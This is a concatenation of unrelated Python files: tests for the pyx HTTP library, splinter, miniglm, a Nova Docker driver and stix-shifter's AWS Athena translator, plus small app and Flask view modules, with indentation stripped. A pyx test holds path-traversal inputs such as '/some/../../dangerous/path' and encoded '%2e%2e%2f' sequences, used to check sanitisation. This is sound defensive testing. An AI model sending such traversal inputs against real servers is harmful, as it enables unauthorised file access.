'supported_instances': ('[["i686", "docker", "lxc"],'
' ["x86_64", "docker", "lxc"]]')
}
self.assertEqual(expected_stats, stats)
def test_plug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.plug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_unplug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.unplug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_create_container(self, image_info=None):
instance_href = utils.get_test_instance()
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
                              'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href)
def test_create_container_vcpus_2(self, image_info=None):
flavor = utils.get_test_flavor(options={
'name': 'vcpu_2',
'flavorid': 'vcpu_2',
'vcpus': 2
})
instance_href = utils.get_test_instance(flavor=flavor)
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href, vcpus=2)
def _assert_cpu_shares(self, instance_href, vcpus=4):
container_id = self.connection.find_container_by_name(
instance_href['name']).get('id')
container_info = self.connection.docker.inspect_container(container_id)
self.assertEqual(vcpus * 1024, container_info['Config']['CpuShares'])
def test_create_container_wrong_image(self):
instance_href = utils.get_test_instance()
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'invalid_format'
self.assertRaises(exception.InstanceDeployFailure,
self.test_create_container,
image_info)
@mock.patch.object(network, 'teardown_network')
@mock.patch.object(nova.virt.docker.driver.DockerDriver,
'find_container_by_name', return_value={'id': 'fake_id'})
def test_destroy_container(self, byname_mock, teardown_mock):
instance = utils.get_test_instance()
self.connection.destroy(self.context, instance, 'fake_networkinfo')
byname_mock.assert_called_once_with(instance['name'])
teardown_mock.assert_called_with('fake_id')
def test_get_memory_limit_from_sys_meta_in_object(self):
instance = utils.get_test_instance(obj=True)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
def test_get_memory_limit_from_sys_meta_in_db_instance(self):
instance = utils.get_test_instance(obj=False)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
| 1.796875 | 2 |
pyx/tests/test_http.py | l04m33/pyx | 2 | 5072 | import unittest
import unittest.mock as mock
import asyncio
import pyx.http as http
def create_dummy_message():
msg = http.HttpMessage(None)
msg.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Cookie', 'a'),
http.HttpHeader('Cookie', 'b'),
]
return msg
def create_dummy_connection():
loop = asyncio.get_event_loop()
reader = asyncio.StreamReader(loop=loop)
@asyncio.coroutine
def dummy_drain():
yield from asyncio.sleep(0.001)
writer = mock.Mock(spec=asyncio.StreamWriter)
writer.attach_mock(mock.Mock(wraps=dummy_drain), 'drain')
conn = http.HttpConnection(reader, writer)
return conn
def create_dummy_request():
conn = create_dummy_connection()
req = http.HttpRequest(conn)
return req
class TestHttpMessage(unittest.TestCase):
def test_get_header(self):
msg = create_dummy_message()
self.assertEqual(msg.get_header("server"), ["Pyx"])
self.assertEqual(msg.get_header("SERVER"), ["Pyx"])
self.assertEqual(msg.get_header("pragma"), [])
self.assertEqual(msg.get_header("cookie"), ["a", "b"])
self.assertEqual(msg.get_first_header("cookie"), "a")
self.assertTrue(msg.get_first_header("pragma") is None)
def test_write_headers(self):
msg = create_dummy_message()
self.assertEqual(msg.write_headers(),
['Server: Pyx', 'Cookie: a', 'Cookie: b'])
msg.headers = []
self.assertEqual(msg.write_headers(), [])
class TestHttpRequest(unittest.TestCase):
def test_parse_req_line(self):
req = create_dummy_request()
req._parse_req_line(b'POST / HTTP/1.1\r\n')
self.assertEqual(req.method, 'POST')
self.assertEqual(req.path, '/')
self.assertTrue(req.query is None)
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
req._parse_req_line(
b'GET /some/path?some=query&some_other=query HTTP/1.1\r\n')
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/some/path')
self.assertEqual(req.query, 'some=query&some_other=query')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET /\r\n')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET / GARBAGE\r\n')
req._parse_req_line(b'GET / HTTP/1\r\n')
self.assertEqual(req.version, (1, 0))
def test_parse_header(self):
req = create_dummy_request()
req._parse_header(b'Server: Pyx\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', 'Pyx')])
req.headers = []
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b'Server\r\n')
req.headers = []
req._parse_header(b'Server:\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Server: \r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Host: some.badasshost.com:8080\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Host', 'some.badasshost.com:8080')])
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b': pyx\r\n')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' : pyx')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' \t : pyx')
def test_parse(self):
loop = asyncio.get_event_loop()
conn = create_dummy_connection()
reader = conn.reader
reader.feed_data(
b'GET /?q=p&s=t HTTP/1.1\r\n'
b'Host: localhost\r\n'
b'Connection: Keep-Alive\r\n'
b'Pragma: Test\r\n'
b' : Test\r\n'
b'\r\n')
req = loop.run_until_complete(http.HttpRequest.parse(conn))
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/')
self.assertEqual(req.query, 'q=p&s=t')
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
self.assertEqual(req.headers,
[
http.HttpHeader('Host', 'localhost'),
http.HttpHeader('Connection', 'Keep-Alive'),
http.HttpHeader('Pragma', 'Test'),
])
def test_respond(self):
req = create_dummy_request()
req.version = (1, 1)
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertEqual(resp.version, (1, 1))
req.version = (1, 0)
resp = req.respond(400)
self.assertEqual(resp.code, 400)
self.assertEqual(resp.version, (1, 0))
class TestHttpResponse(unittest.TestCase):
def test_write(self):
resp = http.HttpResponse(200, None)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Connection', 'keep-alive')
]
self.assertEqual(resp.write(),
['HTTP/1.1 200 OK',
'Server: Pyx',
'Connection: keep-alive',
'\r\n'])
self.assertEqual(str(resp),
'HTTP/1.1 200 OK\r\n'
'Server: Pyx\r\n'
'Connection: keep-alive\r\n'
'\r\n')
def test_send(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertFalse(req.responded)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Content-Length', '100'),
http.HttpHeader('Content-Type', 'text/plain'),
]
loop.run_until_complete(resp.send())
resp.connection.writer.write.assert_called_with(str(resp).encode())
self.assertTrue(req.responded)
def test_send_body(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
loop.run_until_complete(resp.send())
self.assertTrue(req.responded)
loop.run_until_complete(resp.send_body(b'Yes, this is the body.'))
resp.connection.writer.write.assert_called_with(b'Yes, this is the body.')
loop.run_until_complete(resp.send_body('This is another string body.'))
resp.connection.writer.write.assert_called_with(b'This is another string body.')
class DummyResource(http.UrlResource):
def get_child(self, key):
if key == 'hello':
return self
elif key == "static":
return http.StaticRootResource('.')
else:
raise http.HttpError(404, '{} not found'.format(key))
class TestUrlResource(unittest.TestCase):
def test_traverse(self):
res = DummyResource()
self.assertEqual(res.traverse(''), res)
self.assertEqual(res.traverse('/'), res)
self.assertEqual(res.traverse('/hello'), res)
with self.assertRaises(http.HttpError):
res.traverse('/does/not/exist')
sres = res.traverse('/static')
self.assertEqual(sres.root, '.')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/some/path')
self.assertEqual(sres._build_real_path(), './some/path')
def test_not_implemented(self):
res = http.UrlResource()
with self.assertRaises(NotImplementedError):
res.traverse('/hello')
req = create_dummy_request()
with self.assertRaises(NotImplementedError):
res.handle_request(req)
class TestStaticRootResource(unittest.TestCase):
def test_build_real_path(self):
res = http.StaticRootResource('local_root')
res = res.traverse('/some/long/path/where/ever/it/leads/')
self.assertEqual(res._build_real_path(),
'local_root/some/long/path/where/ever/it/leads')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/%2e%2e%2f%2e%2e/dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
| 2.5625 | 3 |
tests/test_webdriver_chrome.py | kidosoft/splinter | 1 | 5073 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
try:
Browser("chrome")
except WebDriverException:
return False
return True
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome")
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'mockfile.txt'
)
self.browser.attach_file('file', file_path)
self.browser.find_by_name('upload').click()
html = self.browser.html
self.assertIn('text/plain', html)
self.assertIn(open(file_path).read().encode('utf-8'), html)
def test_should_support_with_statement(self):
with Browser('chrome') as internet:
pass
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome", fullscreen=True)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_should_support_with_statement(self):
with Browser('chrome', fullscreen=True) as internet:
pass
| 2.328125 | 2 |
main.py | DuskXi/ArkX | 2 | 5074 | <filename>main.py
import os
import json
from File.file import File
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def fileRead(fileName, encoding='utf-8'):
with open(fileName, encoding=encoding) as f:
return f.read()
def main():
from Automation.distributor import Distributor
from Performance import recoder
from WebInterface import web
modelConfig = json.loads(fileRead("config/model.json"))
labelsName = json.loads(fileRead("config/labelsName.json"))
config = json.loads(fileRead("config/config.json"))
# file = File()
classifyModel = modelConfig["imageClassificationModel"]
# if not file.mergedFile(classifyModel["filePath"], classifyModel["fileName"], classifyModel["files"]):
# print("文件合并失败")
# print("回车退出")
# input()
# exit(0)
recoder.Recoder.debug = False
recoder.Recoder.debugSleepingTime = 60 * 60
recoder.Recoder.initDataSet([modelConfig["objectDetectionModel"]["modelName"], modelConfig["addSanityModel"]["modelName"]],
[classifyModel["modelName"]])
# modelConfig["imageClassificationModel"]["filePath"] = os.path.join(classifyModel["filePath"], classifyModel["fileName"])
distributor = Distributor(modelConfig, config["adb_path"], labelsName)
web.run(distributor, config)
if __name__ == "__main__":
main()
| 2.296875 | 2 |
tests/test_simple.py | cprogrammer1994/miniglm | 4 | 5075 | <reponame>cprogrammer1994/miniglm<filename>tests/test_simple.py<gh_stars>1-10
import struct
import numpy as np
import pytest
import miniglm
def test_add_vec_vec():
res = miniglm.add((1.0, 2.0, 3.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (2.5, 3.8, 4.2))
assert type(res) is tuple
def test_add_vec_scalar():
res = miniglm.add((1.0, 2.0, 3.0), 0.5)
np.testing.assert_almost_equal(res, (1.5, 2.5, 3.5))
assert type(res) is tuple
def test_sub_vec_vec():
res = miniglm.sub((5.0, 6.0, 7.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (3.5, 4.2, 5.8))
assert type(res) is tuple
def test_sub_vec_scalar():
res = miniglm.sub((5.0, 6.0, 7.0), 1.5)
np.testing.assert_almost_equal(res, (3.5, 4.5, 5.5))
assert type(res) is tuple
def test_mul_vec_vec():
res = miniglm.mul((5.0, 6.0, 7.0), (1.5, 1.8, 1.2))
np.testing.assert_almost_equal(res, (7.5, 10.8, 8.4))
assert type(res) is tuple
def test_mul_vec_scalar():
res = miniglm.mul((1.0, 2.0, 3.0), 2.0)
np.testing.assert_almost_equal(res, (2.0, 4.0, 6.0))
assert type(res) is tuple
def test_cross():
res = miniglm.cross((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, (-59.45, -5.18, 19.3))
assert type(res) is tuple
def test_dot_vec():
res = miniglm.dot((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, 58.83)
def test_dot_quat():
res = miniglm.dot((2.0, 3.5, 7.1), (0.2, 10.0, 3.3))
np.testing.assert_almost_equal(res, 58.83)
def test_mix_vec():
res = miniglm.mix((2.5, 3.4, 4.6), (7.2, 1.1, 3.2), 0.2)
np.testing.assert_almost_equal(res, (3.44, 2.94, 4.32))
assert type(res) is tuple
def test_mix_scalar():
res = miniglm.mix(1.0, 3.0, 0.5)
np.testing.assert_almost_equal(res, 2.0)
def test_rotate():
res = miniglm.rotate(miniglm.pi / 3.0, miniglm.norm((0.48, 0.60, 0.64)))
expected = (0.24, 0.3, 0.32, 0.8660254037844387)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_split_quat():
quat = (0.24, 0.3, 0.32, 0.8660254037844387)
angle, axis = miniglm.split(quat)
np.testing.assert_almost_equal(angle, miniglm.pi / 3.0)
np.testing.assert_almost_equal(axis, (0.48, 0.60, 0.64))
assert type(axis) is tuple
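# Note (inferred from the expected values above and below): miniglm represents
# quaternions as plain (x, y, z, w) tuples, so rotate(angle, axis) returns
# (axis * sin(angle / 2), cos(angle / 2)).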
def test_rotate_x_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (1.0, 0.0, 0.0))
np.testing.assert_almost_equal(res, (np.sqrt(2.0) / 2.0, 0.0, 0.0, np.sqrt(2.0) / 2.0))
def test_rotate_y_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (0.0, 1.0, 0.0))
np.testing.assert_almost_equal(res, (0.0, np.sqrt(2.0) / 2.0, 0.0, np.sqrt(2.0) / 2.0))
def test_rotate_z_90_deg():
res = miniglm.rotate(miniglm.pi / 2.0, (0.0, 0.0, 1.0))
np.testing.assert_almost_equal(res, (0.0, 0.0, np.sqrt(2.0) / 2.0, np.sqrt(2.0) / 2.0))
def test_norm_vec():
res = miniglm.norm((48.0, 60.0, 64.0))
expected = (0.48, 0.60, 0.64)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_norm_quat():
res = miniglm.norm((2.0, 4.0, 8.0, 4.0))
expected = (0.2, 0.4, 0.8, 0.4)
np.testing.assert_almost_equal(res, expected)
assert type(res) is tuple
def test_norm_mat():
mat = (
0.074, 0.962, -0.259,
-0.518, 0.259, 0.814,
0.851, 0.074, 0.518,
)
res = miniglm.norm(mat)
np.testing.assert_almost_equal(miniglm.det(res), 1.0)
np.testing.assert_almost_equal(miniglm.cross(res[0:3], res[3:6]), res[6:9])
np.testing.assert_almost_equal(miniglm.dot(res[0:3], res[3:6]), 0.0)
np.testing.assert_almost_equal(miniglm.dot(res[3:6], res[6:9]), 0.0)
np.testing.assert_almost_equal(miniglm.dot(res[0:3], res[6:9]), 0.0)
assert type(res) is tuple
def test_cast():
quat = (0.2, 0.4, 0.8, 0.4)
mat = (-0.6, 0.8, 0.0, -0.48, -0.36, 0.8, 0.64, 0.48, 0.6)
np.testing.assert_almost_equal(miniglm.cast(quat), mat)
np.testing.assert_almost_equal(miniglm.cast(mat), quat)
np.testing.assert_almost_equal(miniglm.cast(miniglm.cast(quat)), quat)
np.testing.assert_almost_equal(miniglm.cast(miniglm.cast(mat)), mat)
def test_swizzle_vec():
res = miniglm.swizzle((1.0, 2.0, 3.0), 'yxz')
np.testing.assert_almost_equal(res, (2.0, 1.0, 3.0))
def test_swizzle_quat():
res = miniglm.swizzle((0.1, 0.7, 0.5, 0.5), 'wxyz')
np.testing.assert_almost_equal(res, (0.5, 0.1, 0.7, 0.5))
def test_pack_scalar():
assert miniglm.pack(1.75) == struct.pack('f', 1.75)
def test_pack_vec():
vec = (1.0, 2.0, 3.0)
assert miniglm.pack(vec) == struct.pack('fff', *vec)
def test_pack_quat():
quat = (0.1, 0.7, 0.5, 0.5)
assert miniglm.pack(quat) == struct.pack('ffff', *quat)
def test_pack_mat():
mat = (1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0, 8.0, 9.0)
assert miniglm.pack(mat) == struct.pack('fffffffff', *mat)
| 2.171875 | 2 |
flaskbb/plugins/news/views.py | konstantin1985/forum | 0 | 5076 | <filename>flaskbb/plugins/news/views.py<gh_stars>0
# -*- coding: utf-8 -*-
from flask import Blueprint, redirect
from flaskbb.utils.helpers import render_template
from .forms import AddForm, DeleteForm
from .models import MyPost
from flaskbb.extensions import db
news = Blueprint("news", __name__, template_folder="templates")
def inject_news_link():
return render_template("navigation_snippet.html")
@news.route("/")
def index():
return render_template("index.html", newsposts = MyPost.query.all())
@news.route('/add', methods=['GET', 'POST'])
def add():
form = AddForm()
if form.validate_on_submit():
p = MyPost(name = form.name.data, text = form.text.data)
db.session.add(p)
db.session.commit()
return redirect('/news')
return render_template('add.html', form=form)
@news.route('/delete', methods=['GET', 'POST'])
def delete():
form = DeleteForm()
if form.validate_on_submit():
p = MyPost.query.filter(MyPost.name == form.name.data).first()
db.session.delete(p)
db.session.commit()
return redirect('/news')
return render_template('delete.html', form=form)
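# Illustrative note (assumption -- blueprint registration happens in the plugin setup,
# not in this module): the blueprint is expected to be mounted under /news, e.g.
#   app.register_blueprint(news, url_prefix="/news")
# which is why the views above redirect to '/news' after a successful submit.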
| 2.234375 | 2 |
stix_shifter_modules/aws_athena/tests/stix_translation/test_aws_athena_json_to_stix.py | nkhetia31/stix-shifter | 33 | 5077 | from stix_shifter_utils.stix_translation.src.json_to_stix import json_to_stix_translator
from stix_shifter_utils.stix_translation.src.utils.transformer_utils import get_module_transformers
from stix_shifter_modules.aws_athena.entry_point import EntryPoint
import unittest
MODULE = "aws_athena"
entry_point = EntryPoint()
map_data = entry_point.get_results_translator().map_data
data_source = {
"type": "identity",
"id": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"name": "aws_athena",
"identity_class": "events"
}
options = {}
class TestAwsResultsToStix(unittest.TestCase):
"""
    Unit test cases for translating AWS Athena results into STIX observed-data objects
"""
@staticmethod
def get_first(itr, constraint):
"""
        return the first obj in itr for which constraint(obj) is true
"""
return next(
(obj for obj in itr if constraint(obj)),
None
)
@staticmethod
def get_first_of_type(itr, typ):
"""
        return the first object in itr whose STIX 'type' matches typ
"""
return TestAwsResultsToStix.get_first(itr, lambda o: isinstance(o, dict) and o.get('type') == typ)
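    # Example (illustrative): given the translated bundle's `objects` dict,
    #   TestAwsResultsToStix.get_first_of_type(objects.values(), 'ipv4-addr')
    # returns the first observation whose 'type' is 'ipv4-addr', or None if absent.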
def test_common_prop(self):
"""
to test the common stix object properties
"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "\u00d6rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "85.224.242.94 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding/"
"7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1. "
"Brute force attacks are used to gain unauthorized access to your instance by "
"guessing the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "ArcSight Logger"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
assert result_bundle['type'] == 'bundle'
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
assert result_bundle_identity['id'] == data_source['id']
assert result_bundle_identity['name'] == data_source['name']
assert result_bundle_identity['identity_class'] == data_source['identity_class']
observed_data = result_bundle_objects[1]
assert observed_data['id'] is not None
assert observed_data['type'] == "observed-data"
assert observed_data['created_by_ref'] == result_bundle_identity['id']
assert observed_data['created'] is not None
assert observed_data['modified'] is not None
assert observed_data['number_observed'] is not None
def test_vpc_flow_network_json_to_stix(self):
"""to test network stix object properties"""
data = {
"vpcflow": {
"account": 979326520502,
"interfaceid": "eni-04b762de832716892",
"sourceaddress": "192.168.127.12",
"destinationaddress": "172.31.62.249",
"sourceport": 58387,
"destinationport": 51289,
"protocol": "tcp",
"starttime": 1592547796,
"endtime": 1592547798,
"action": "REJECT",
"date": "2020-06-19",
"logstatus": "OK",
"numbytes": 40,
"region": "us-east-1",
"version": 2
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
network_obj = TestAwsResultsToStix.get_first_of_type(objects.values(), 'network-traffic')
assert network_obj is not None, 'network-traffic object type not found'
assert network_obj.keys() == {'type', 'src_ref', 'dst_ref', 'src_port', 'dst_port', 'protocols', 'start', 'end'}
assert network_obj['type'] == 'network-traffic'
assert network_obj['src_ref'] == '1'
assert network_obj['dst_ref'] == '4'
assert network_obj['src_port'] == 58387
assert network_obj['dst_port'] == 51289
assert network_obj['protocols'] == ['tcp']
assert network_obj['start'] == '2020-06-19T06:23:16.000Z'
assert network_obj['end'] == '2020-06-19T06:23:18.000Z'
def test_vpc_flow_custom_attr_json_to_stix(self):
"""to test network stix object properties"""
data = {
"vpcflow": {
"account": 979326520502,
"interfaceid": "eni-04b762de832716892",
"sourceaddress": "192.168.127.12",
"destinationaddress": "172.31.62.249",
"sourceport": 58387,
"destinationport": 51289,
"protocol": "tcp",
"starttime": 1592547796,
"endtime": 1592547798,
"action": "REJECT",
"date": "2020-06-19",
"logstatus": "OK",
"numbytes": 40,
"region": "us-east-1",
"version": 2
}
}
options = {"unmapped_fallback": True}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
custom_object = TestAwsResultsToStix.get_first_of_type(objects.values(), 'x-aws-athena')
assert custom_object.keys() == {'type', 'interfaceid', 'date', 'logstatus', 'numbytes', 'region', 'version'}
assert custom_object['date'] == '2020-06-19'
assert custom_object['logstatus'] == 'OK'
assert custom_object['numbytes'] == 40
assert custom_object['region'] == 'us-east-1'
assert custom_object['version'] == 2
def test_guardduty_network_json_to_stix(self):
"""to test network stix object properties"""
data = {
"guardduty": {
"accountid": 979326520502,
"region": "us-east-1",
"type": "UnauthorizedAccess:EC2/SSHBruteForce",
"resource_instancedetails_networkinterfaces_0_privatednsname": "ip-172-31-60-104.ec2.internal",
"resource_instancedetails_networkinterfaces_0_privateipaddress": "172.31.60.104",
"resource_instancedetails_networkinterfaces_0_subnetid": "subnet-ea9d6be4",
"resource_instancedetails_networkinterfaces_0_publicdnsname": "ec2-18-210-22-128.compute-1."
"amazonaws.com",
"resource_instancedetails_networkinterfaces_0_vpcid": "vpc-10db926a",
"resource_instancedetails_networkinterfaces_0_publicip": "172.16.31.10",
"resource_instancedetails_networkinterfaces_0_networkinterfaceid": "eni-0203098cca62c3f21",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupid": "sg-018edb43fcc81525f",
"resource_instancedetails_networkinterfaces_0_securitygroups_0_groupname": "launch-wizard-13",
"resource_instancedetails_imageid": "ami-0015fcaa5516c75ed",
"resource_instancedetails_instanceid": "i-031cb81e1f32a36e1",
"resource_instancedetails_availabilityzone": "us-east-1f",
"service_eventfirstseen": "2020-07-31T06:19:09Z",
"service_action_networkconnectionaction_protocol": "TCP",
"service_action_networkconnectionaction_remoteportdetails_port": "38420",
"service_action_networkconnectionaction_remoteipdetails_country_countryname": "Sweden",
"service_action_networkconnectionaction_remoteipdetails_ipaddressv4": "172.16.31.10",
"service_action_networkconnectionaction_remoteipdetails_city_cityname": "rebro",
"service_action_networkconnectionaction_localportdetails_port": "22",
"service_eventlastseen": "2020-09-12T09:19:40Z",
"severity": 2,
"title": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1.",
"arn": "arn:aws:guardduty:us-east-1:979326520502:detector/6ab6e6ee780ed494f3b7ca56acdc74df/finding"
"/7ab9d1cb6248e05a0e419a79528761cb",
"createdat": "2020-07-31T06:37:13.745Z",
"description": "172.16.31.10 is performing SSH brute force attacks against i-031cb81e1f32a36e1. "
"Brute force attacks are used to gain unauthorized access to your instance by "
"guessing the SSH password.",
"finding_id": "7ab9d1cb6248e05a0e419a79528761cb",
"partition": "aws",
"resource": {
"instancedetails": {
"imagedescription": "Provided by Red Hat, Inc.",
"instancestate": "running",
"instancetype": "t2.large",
"launchtime": "2020-09-11T23:16:03Z",
"tags": {
"0": {
"key": "Name",
"value": "<NAME>"
}
}
},
"resourcetype": "Instance"
},
"schemaversion": 2.0,
"service": {
"action": {
"actiontype": "NETWORK_CONNECTION",
"networkconnectionaction": {
"connectiondirection": "INBOUND",
"localportdetails": {
"portname": "SSH"
},
"remoteipdetails": {
"geolocation": {
"lat": "59.2741",
"lon": "15.2066"
},
"organization": {
"asn": "2119",
"asnorg": "Telenor Norge AS",
"isp": "Telenor Sverige AB",
"org": "Telenor Sverige AB"
}
},
"remoteportdetails": {
"portname": "Unknown"
}
}
},
"count": "20",
"detectorid": "6ab6e6ee780ed494f3b7ca56acdc74df",
"resourcerole": "TARGET",
"servicename": "guardduty"
},
"updatedat": "2020-09-12T09:25:34.086Z"
}
}
result_bundle = json_to_stix_translator.convert_to_stix(
data_source, map_data, [data], get_module_transformers(MODULE), options)
result_bundle_objects = result_bundle['objects']
result_bundle_identity = result_bundle_objects[0]
assert result_bundle_identity['type'] == data_source['type']
observed_data = result_bundle_objects[1]
assert 'objects' in observed_data
objects = observed_data['objects']
network_obj = TestAwsResultsToStix.get_first_of_type(objects.values(), 'network-traffic')
assert network_obj is not None, 'network-traffic object type not found'
assert network_obj.keys() == {'type', 'dst_port', 'src_ref', 'dst_ref', 'src_port', 'protocols'}
